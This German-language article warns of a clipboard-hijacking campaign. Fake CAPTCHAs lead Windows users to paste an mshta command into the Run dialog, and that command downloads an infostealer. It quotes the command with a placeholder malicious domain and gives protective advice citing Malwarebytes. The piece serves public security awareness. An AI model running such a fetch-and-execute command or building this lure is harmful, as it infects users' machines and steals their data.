Aktuelle Gefahr durch Clipboard-Hijacking
Eine bemerkenswerte Angriffswelle ist derzeit im Umlauf. Cyberkriminelle nutzen speziell präparierte Websites um über einen Clipboard-Hijacking-Angriff Infostealer auf Windows-Rechner zu schleusen. Der Sicherheitssoftware-Hersteller Malwarebytes veröffentlicht regelmäßig Warnungen zu diesem Thema.
Die Strategie der Angreifer
In einem jüngst veröffentlichten Blogpost beschreibt Malwarebytes den Cyberangriff. Zunächst zielte dieser auf Unternehmen ab. Doch inzwischen kann jeder zum Ziel werden. Die Angreifer setzen gefälschte Captchas als zentrales Mittel ein.
Es gibt spezielle, gefälschte Webseiten welche vorgeben, Film-, Musik- oder Newsinhalte anzubieten. Doch in Wahrheit stecken sie voller schädlichem Code.
Wie der Angriff funktioniert
Sobald ein Besucher die präparierte Seite öffnet, wird eine Captcha-Abfrage angezeigt. Der Hinweis „Ich bin kein Roboter“ mag vielen Menschen bekannt erscheinen. Normalerweise klicken sie unachtsam auf das entsprechende Feld. Doch ebendies hier beginnt der Clipboard-Hijacking-Angriff.
Der Hintergrund ist heimlich aktiv. Der JavaScript-Code greift auf die Zwischenablage zu – ohne dass der Benutzer es bemerkt. Das kann schwerwiegende Folgen haben.
Misstrauisch werden bei Fake-Captchas
Nach dem ersten Captcha folgt eine wesentlich komplexere Abfrage. Jetzt sollten technisch versierte Benutzer aufhorchen. Anstatt Fahrzeuge oder verschwommene Texte zu zählen fordert das Captcha den Nutzer auf spezifische Tastaturkürzel zu drücken.
Die Eingabe von „Windows + R“ gefolgt von „Strg + V“ bedeutet: Es öffnet sich das Dialogfeld „Eingabeaufforderung“. Der Text im Clipboard wird dann in das Feld eingefügt.
Infostealer wird heruntergeladen
Folgt der Nutzer diesen Anweisungen, manipuliert er seine eigenen Daten. Das eingefügte Textfeld enthält den Befehl zum Herunterladen des Infostealers. Der Befehl lautet: `mshta https://{malicious.domain}/media.file`. Damit wird die legitime Windows-Komponente mshta.exe missbraucht.
Der Nutzer sieht in diesem Schritt nur einen harmlosen Ausschnitt des gehackten Clipboard-Inhalts. Es wird ein Kommentar hinzugefügt – der den Befehl maskiert.
So kann man sich schützen
Malwarebytes empfiehlt, JavaScript zu deaktivieren um die Gefahr durch gefälschte Captchas komplett zu neutralisieren. Allerdings ist dies in der heutigen Internetlandschaft nicht sehr praktikabel.
Ein einfaches Wissen über die Funktionsweise von Captchas kann jedoch helfen, einen solchen Angriff zu verhindern.
Zusätzlich funktioniert der Angriff möglicherweise nicht in allen Browserversionen. Die verwendete Methode, `execCommand()` ist veraltet.
Abschließend bleibt festzuhalten: Nutzer sollten wachsam sein und regelmäßig ihren Browser und ebenfalls Antiviren-Software aktualisieren. Datenklau durch Malware ist ein ernstzunehmendes Risiko.
Kommentare